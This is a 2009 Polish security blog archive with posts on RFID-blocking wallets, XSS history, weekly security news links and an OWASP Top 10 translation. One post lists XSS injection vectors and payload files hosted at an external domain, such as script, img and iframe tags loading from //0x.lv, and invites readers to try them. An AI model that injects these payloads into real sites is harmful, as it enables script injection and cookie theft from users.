19 gru 2009

Stalowa chrona kart zbliżeniowych

Posiadając, ostatnio często reklamowane przez różne bank, kartę zbliżeniową, jesteśmy narażeni na możliwość zczytania z niej danych.

W jaki sposób możemy się zabezpieczyć przed złodziejami? Z pomocą przychodzi portfel 'utkany ze stali'.



Według opisu producenta, posiadając taki portfel, możemy się odprężyć i być spokojni, że nasze dane pozostaną przy nas.

Portfel utkany jest z ponad 20.000 super cienkich nici wykonanych z nierdzewnej stali. Gęstość konstrukcji tworzy pancerz naokoło naszych kart. Dzięki niej, nasze karty, są bezpieczniejsze niż do tej pory.

Metodologia szycia przypomina nam model klatki Faradaya - pomieszczenia mającego na celu zablokowanie zewnętrznych pól elektrycznych. Analogicznie wykonany portfel, zapewnia zabezpieczenie jego zawartości.

Oprócz utrudnienia zczytywania danych dla 'nowoczesnych' kieszonkowców, stalowy portfel zabezpiecza karty również przed kradzieżą metodę brute-force ;) (metal zamiast materiału).

Portfel jest w stanie pomieścić sześć kart, posiada dwa sloty wewnętrzne i 'spinkę' na banknoty.

W tej chwili dostępne są dwa modele - "Smooth" oraz "Engine Turned" - w cenie $79.95(£49 /€ 55) ~ ok. 232 PLN

Więcej o portfelu: http://www.herringtoncatalog.com/es675.html
Autor: Michał Wiczyński (wheelq) Unknown o 07:32 0 komentarze
Etykiety:

16 gru 2009

#10 'te #urodziny #xss ! sto lat sto lat :)

16-ego stycznia, 2000, dla małej grupki inżynierów w Microsoft, zostaly zasugerowane nastepujace nazwy:

Unauthorized Site Scripting
Unofficial Site Scripting
URL Parameter Script Insertion
Cross Site Scripting
Synthesized Scripting
Fraudulent Scripting

Następnego dnia uzgodniono nazwę - Cross Site Scripting.

Na początku lutego, wypuszczono dokument (CERT):

http://www.cert.org/advisories/CA-2000-02.html

Według niektórych źródeł, za datę narodzin #XSS uznaje się środek grudnia 1999 (czyli 10 lat temu). Jednak zgodzę się tutaj z radekk, i też uznałbym raczej datę 'advisory release'.


Co się zmieniło przez ten czas? Bardzo wiele :).

Kiedyś #XSS uznawane były za nic nie znaczące, denerwujące błędy umożliwiające wyświetlenie okienka z napisem CZESC.

Wraz z pojawieniem sie 'web 2.0' sytuacja ta zmieniła się. Powstały potężne społeczności internetowe, zawierające setki tysięcy danych użytkowników. Idealne miejsce do zbierania informacji typu: login, hasło, mail, odrazu stało się głównym celem hackerów, phisherów (chyba wszyscy pamiętamy popularnego Samy (JS.Spacehero). Błędy typu SQL Injection nie były już problemem 'numer jeden' (chociaż nadal są równie niebezpieczne), bo po co dostawać się do wnętrza systemu, skoro można wykorzystać błąd po stronie zalogowanego użytkownika, pobierając jego dane identyfikacyjne (np. dane zawarte w cookie).

XSS rozwijało się w zastraszającym tempie, od prostych skryptów typu alert(document.cookie), aż po wyrafinowane skrypty które można łączyć z innego rodzaju błędami. Jako ciekawostki można polecić:

Cross Domain Search Timing

Sprawdz czy jestes zalogowany/a na google

Łącząc różne techniki ataków (CSRF, XCSS...), można stworzyć naprawdę niebezpieczne skrypty/ robaki, infekujące zarówno web serwisy, jak i komputery użytkowników.

Jak widać, nigdy nie należy nie doceniać nawet najprostszego rodzaju błędów.

3RTHF3QVVPJ2
Autor: Michał Wiczyński (wheelq) Unknown o 03:10 1 komentarze
Etykiety: , ,

9 gru 2009

(update) do (in)security tygodnia

Nie wiem czemu ale zapodzialo mi się to gdzieś, więc wstawiam teraz:


http://www.heise-online.pl/security/news/item/Nowy-sposob-lamania-szyfru-AES-878754.html Nowy sposób na #łamanie #AES #security #crypto
Autor: Michał Wiczyński (wheelq) Unknown o 04:14 0 komentarze
Etykiety:

All in one exploit...s !

Witam. Dzisiaj w moje raczki wpadla super paczka mini tyci exploitow ;)

Otoz pan sirdarckcat przed chwilą opublikował niezły zestaw exploitów all in one.

Oto one:

http://0x.lv/xss.xml XBL+XHTML

http://0x.lv/xss.css (binding/expression/jsuri)

http://0x.lv/xss.swf (getURL)

<script src=//0x.lv> LUB <link rel=stylesheet href=//0x.lv> LUB <img src=//0x.lv> LUB <iframe src=//0x.lv> także: XHR/RFI/etc


Testujcie testujcie :)

http://0x.lv/ all in one BMP+JS+CSS+HTML+HTTP+XHR XSS exploit ;)
Autor: Michał Wiczyński (wheelq) Unknown o 03:07 0 komentarze
Etykiety:

8 gru 2009

(in)security tygodnia

Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek ze świata security:

http://www.net-security.org/secworld.php?id=8594
#Fake #fingerprint fools #biometric #devices #security


http://www.heise-online.pl/security/news/item/Ostatnia-deska-ratunku-UFO-hakera-877758.html
Ostatnia deska ratunku "#UFO-#haker a"#Gary ’ego #McKinnon a


http://www.networkworld.com/news/2009/120709-facebook-users-fall-for-rubber.html

#Facebook users fall for #rubber #duck 's #friend request #security


http://packetstormsecurity.org/filedesc/xampp172-password.txt.html
The page used to change the #administrative #password in #XAMPP version #1.7.2 has no access #restrictions in place. #security

http://www.security.nl/artikel/31717/1/NASA_websites_via_SQL-injectie_gehackt.html
#NASA #website s via #SQL -#injection #security

http://flaker.pl/f/3213052
#HTML5 new #XSS #vectors

http://bothunters.pl/2009/12/02/wykryto-rozproszony-system-odgadywania-hasel-do-uslugi-yahoo-mail/
Wykryto rozproszony system odgadywania #haseł do usługi #Yahoo #mail #security



http://pentestit.com/2009/12/08/waca-web-application-configuration-analyzer
#WACA: The #Web #Application #Configuration #Analyzer ! #security


http://www.securiteam.com/unixfocus/6S0012AQAQ.html
#FreeBSD #SSL and #TLS #Session #Renegotiation #vulnerability #security



http://www.securityfocus.com/bid/37212
#Microsoft #Internet #Explorer #CSS #Race #Condition #Remote #Code #Execution #Vulnerability
Autor: Michał Wiczyński (wheelq) Unknown o 17:17 0 komentarze
Etykiety:

2 gru 2009

OWASP TOP10 2010 RC1 PL

W związku z niedawno opulbikowanym #OWASP TOP10 RC1 http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project postanowiłem przetłumaczyć dokument, wzbogacając go o parę własnych zdań. Dokument pobieramy tutaj: http://www.slideshare.net/thinksecure/owasp-top10-2010-rc1-pl


Aktualizacja:

Zapraszam rowniez na: http://pentester.jogger.pl/2009/12/02/owasp-top-10/


Owasp Top10 2010 RC1 PL
View more documents from Think Secure.
Autor: Michał Wiczyński (wheelq) Unknown o 14:10 0 komentarze

1 gru 2009

(in)security tygodnia


Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek ze świata security:


http://www.heise-online.pl/security/news/item/Exploit-dajacy-uprawnienia-roota-w-FreeBSD-Uzupelnienie-873354.html #Exploit dający uprawnienia roota w #FreeBSD #security #root

http://www.thespanner.co.uk/2009/11/23/ping-pong-obfuscation/ #Obfuskacja w obfuskacji obfuskacji... #xss #security #garethheyes #obfuscation

http://seclists.org/fulldisclosure/2009/Nov/349 bledy #XSS na stronach #404 w #Apache #Tomcat

http://www.theregister.co.uk/2009/11/30/wordpress_password_cracking/ #Web service #automates #WordPress #password #cracking #security

http://www.net-security.org/secworld.php?id=8550 #Nessus 4.2 #released #security

http://feedproxy.google.com/~r/wampir-mroczna-zaloga-org/~3/1_kokNJtzNc/772-o-unikaniu-waf.html Shocking #News in #PHP #Exploitation (autor: #Stefan #Esser) #security

http://pentestit.com/2009/11/28/pixy-tool-finding-xss-sqli-vulnerabilities/ #Pixy – Tool for finding #XSS and #SQLI #vulnerabilities #security

http://gynvael.coldwind.pl/?id=256 #security #CONFidence #2.0, #materiały, #SilkProxy 0.0.1


http://www.securityfocus.com/news/11565?ref=rss #ie8 #xss #security



Autor: Michał Wiczyński (wheelq) Unknown o 09:17 0 komentarze
Etykiety:
Subskrybuj: Posty (Atom)